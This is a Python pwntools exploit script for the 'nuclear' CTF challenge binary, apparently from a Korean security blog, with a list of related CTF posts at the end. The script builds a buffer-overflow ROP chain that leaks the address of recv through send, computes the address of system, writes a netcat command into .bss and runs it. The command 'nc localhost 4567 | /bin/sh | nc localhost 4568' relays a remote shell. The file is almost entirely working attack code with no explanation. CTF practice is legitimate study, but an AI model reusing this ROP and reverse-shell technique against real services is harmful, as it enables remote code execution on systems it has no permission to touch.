from pwn import *
elf = ELF("./nuclear")
rop = ROP(elf)
recv_plt,send_plt = elf.plt['recv'], elf.plt['send']
recv_got,send_got = elf.got['recv'], elf.got['send']
ppppr = 0x0804917C
boom = 0x08048B5B
print "read_plt : " + str(hex(recv_plt))
print "send_plt : " + str(hex(send_plt))
print "read_got : " + str(hex(recv_got))
print "send_got : " + str(hex(send_got))
conn = remote('localhost', 1129)
payload = "launch\n"
conn.send(payload)
sleep(0.3)
payload = "1234567890123456789\n"
conn.send(payload)
payload = "A" * 512
payload += p32(4)
payload += "A" * 8
payload += "B" * 4
payload += p32(send_plt) # ret
payload += p32(ppppr)
payload += p32(4)
payload += p32(recv_got)
payload += p32(4)
payload += p32(0)
payload += p32(boom)
payload += "AAAA"
payload += p32(4)
conn.send(payload)
print conn.recvuntil("Sorry.. We can't stop this action.. G00D Luck!\n")
recv_addr = u32(conn.recv(4))
print "recv_addr : " + hex(recv_addr)
system_recv = 4112
system_addr = recv_addr + system_recv
print "system_addr : " + hex(system_addr)
cmd = "nc localhost 4567 | /bin/sh | nc localhost 4568"
bss_addr = 0x0804B080
payload2 = "A" * 512
payload2 += p32(4)
payload2 += "A" * 8
payload2 += "B" * 4
payload2 += p32(recv_plt) # ret
payload2 += p32(ppppr)
payload2 += p32(4)
payload2 += p32(bss_addr)
payload2 += p32(len(cmd))
payload2 += p32(0)
payload2 += p32(system_addr)
payload2 += "AAAA"
payload2 += p32(bss_addr)
conn.send(payload2)
sleep(0.3)
conn.send(cmd)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
'CTF' 카테고리의 다른 글
| codegate 2013 vuln200 from rop exploit only (0) | 2016.09.04 |
|---|---|
| angry_doraemon exploit only from pwntools (0) | 2016.08.28 |
| DEFCON 2016 easy-prasky (0) | 2016.06.06 |
| DEFCON 2016 baby-re (from angr) (0) | 2016.05.31 |
| DEFCON 2016 xkcd (0) | 2016.05.26 |
